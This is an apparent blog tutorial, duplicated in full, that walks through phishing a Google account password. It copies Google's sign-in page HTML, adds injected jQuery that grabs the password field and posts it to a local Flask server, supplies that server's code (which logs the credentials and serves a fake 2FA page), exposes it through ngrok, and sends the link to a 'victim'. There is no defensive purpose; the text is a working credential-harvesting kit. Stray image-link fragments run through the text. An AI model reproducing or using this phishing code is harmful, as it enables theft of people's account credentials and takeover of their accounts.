REQUIREMENTS
1)KALI LINUX
2)SUBLIME TEXT EDITOR
3)NGROK
STEP 1:
Initially use your browser and search for google sign in
Read: How to shop online without OTP
STEP 2:
Type the mail id you wanna hack, after entering the mail id and click next
AVvXsEhV35Yhw3AlLWcyGcKw557g4UUMcaX67rvXegn6K86 KMgMJJJfFR hZ1h UZVnDmsUFRGE
STEP 3:
After entering the mail id and right click the mouse and click inspect
AVvXsEgpDFvh8fUxXKhLMbmhajZT19OoMsfyz7Hnwrvkd8wkR UW1YBeSgCNBIAQ47NexnXaYlkmxC38XltvHLeTN1xbIFCVTzfhZP7PZ 5Dfir7LNgKdglmioR01xsKSYb 5err1ucOlOLLgfeGDPLVEgDplL2x6RhVGIjmrdtc J gOG3NX98wD96xxRpzeeX
STEP 4:
after clicking inspect element ,go to inspector tab or element tab and right click and click the option called EDIT AS HTML,copy all html codes.
AVvXsEie8 B4qVL7LWPh3wZkVmbwnl5XQpJQgiPiPbnLiIN1qrXZZuLb2g42JyXImEOWkFLcrylqMMYP4zgXBi7rjdhwIWWoNbp6gfnHo iFOReoxhH1Eplg 12u pg8r2mBVmh6yYb49VW2FNN6aQrPbeaKWAhSgbzF xYcJFEld dONw WGzEc4BG
STEP 5:
paste it on sublime text editor and add some script at the end of the html tag
ill drop the code here:
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>
<script>
$('button').click(function(e){
e.preventDefault()
auth=$('input[type=password]').val()
$.post(
"http://localhost:5000/auth",
{"password":auth},
function(data, status){
window.location="http://localhost:5000/login"
}
);
return false;
})
</script>
</html>
save this file as login.html
NOTE:
do it same for 2 factor authentication page
STEP 6:
next we need to write a python code that fetch deets from victim. And save it as app.py
ill give the code below
app.py
#!/usr/bin/env python3
from flask import Flask, render_template, send_file, make_response, request
app = Flask(__name__)
@app.route(“/auth”, methods=[“POST”])
def auth():
print(request.form.to_dict())
return “ok”
@app.route(“/”)
def index():
response = make_response(send_file(“templates/login.html”))
response.headers.add(“Access-Control-Allow-Origin”, “*”)
return response
@app.route(“/login”)
def login():
return send_file(“templates/2fa.html”)
if __name__ == “__main__”:
app.run()
STEP 7:
open terminal in linux and type as i did and configure the ngrok
AVvXsEj8mbxQ9j Xt0mfGbQcGA8MyQb5dSrqwIhx0ojKwclbLoCSN561VzWCBl0Q12yM 9MmiRUhnJDcudVWf4kFqOyVkuMlMQkRCsdTQ6NxPa86j47MlH8qxhLPNdEUqS86zMMQ4 HKoQE36HtLF5197bKMEQxNCRg85tBk5mcLUj99nPoxTR 8ni5UK1bcWgRsW
ngrok command
AVvXsEioVIVL68kSDiBa uWXPXmMPXAI7jafeeUdxuz1gr9 e0mybhs3WBADwrngzLLYCkTAzl NcZkKpoTLJ9nuQqO9xGz379DIYpIboLiBJeL5wrYFXcix3mTT6Mu KLm2eeO4KP qMMkKzsF0c
STEP 8:
And send the link in mail to victim, BOOM…….!!!! youve got a password
1)KALI LINUX
2)SUBLIME TEXT EDITOR
3)NGROK
STEP 1:
Initially use your browser and search for google sign in
Read: How to shop online without OTP
STEP 2:
Type the mail id you wanna hack, after entering the mail id and click next
AVvXsEhV35Yhw3AlLWcyGcKw557g4UUMcaX67rvXegn6K86 KMgMJJJfFR hZ1h UZVnDmsUFRGE
STEP 3:
After entering the mail id and right click the mouse and click inspect
AVvXsEgpDFvh8fUxXKhLMbmhajZT19OoMsfyz7Hnwrvkd8wkR UW1YBeSgCNBIAQ47NexnXaYlkmxC38XltvHLeTN1xbIFCVTzfhZP7PZ 5Dfir7LNgKdglmioR01xsKSYb 5err1ucOlOLLgfeGDPLVEgDplL2x6RhVGIjmrdtc J gOG3NX98wD96xxRpzeeX
STEP 4:
after clicking inspect element ,go to inspector tab or element tab and right click and click the option called EDIT AS HTML,copy all html codes.
AVvXsEie8 B4qVL7LWPh3wZkVmbwnl5XQpJQgiPiPbnLiIN1qrXZZuLb2g42JyXImEOWkFLcrylqMMYP4zgXBi7rjdhwIWWoNbp6gfnHo iFOReoxhH1Eplg 12u pg8r2mBVmh6yYb49VW2FNN6aQrPbeaKWAhSgbzF xYcJFEld dONw WGzEc4BG
STEP 5:
paste it on sublime text editor and add some script at the end of the html tag
ill drop the code here:
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>
<script>
$('button').click(function(e){
e.preventDefault()
auth=$('input[type=password]').val()
$.post(
"http://localhost:5000/auth",
{"password":auth},
function(data, status){
window.location="http://localhost:5000/login"
}
);
return false;
})
</script>
</html>
save this file as login.html
NOTE:
do it same for 2 factor authentication page
STEP 6:
next we need to write a python code that fetch deets from victim. And save it as app.py
ill give the code below
app.py
#!/usr/bin/env python3
from flask import Flask, render_template, send_file, make_response, request
app = Flask(__name__)
@app.route(“/auth”, methods=[“POST”])
def auth():
print(request.form.to_dict())
return “ok”
@app.route(“/”)
def index():
response = make_response(send_file(“templates/login.html”))
response.headers.add(“Access-Control-Allow-Origin”, “*”)
return response
@app.route(“/login”)
def login():
return send_file(“templates/2fa.html”)
if __name__ == “__main__”:
app.run()
STEP 7:
open terminal in linux and type as i did and configure the ngrok
AVvXsEj8mbxQ9j Xt0mfGbQcGA8MyQb5dSrqwIhx0ojKwclbLoCSN561VzWCBl0Q12yM 9MmiRUhnJDcudVWf4kFqOyVkuMlMQkRCsdTQ6NxPa86j47MlH8qxhLPNdEUqS86zMMQ4 HKoQE36HtLF5197bKMEQxNCRg85tBk5mcLUj99nPoxTR 8ni5UK1bcWgRsW
ngrok command
AVvXsEioVIVL68kSDiBa uWXPXmMPXAI7jafeeUdxuz1gr9 e0mybhs3WBADwrngzLLYCkTAzl NcZkKpoTLJ9nuQqO9xGz379DIYpIboLiBJeL5wrYFXcix3mTT6Mu KLm2eeO4KP qMMkKzsF0c
STEP 8:
And send the link in mail to victim, BOOM…….!!!! youve got a password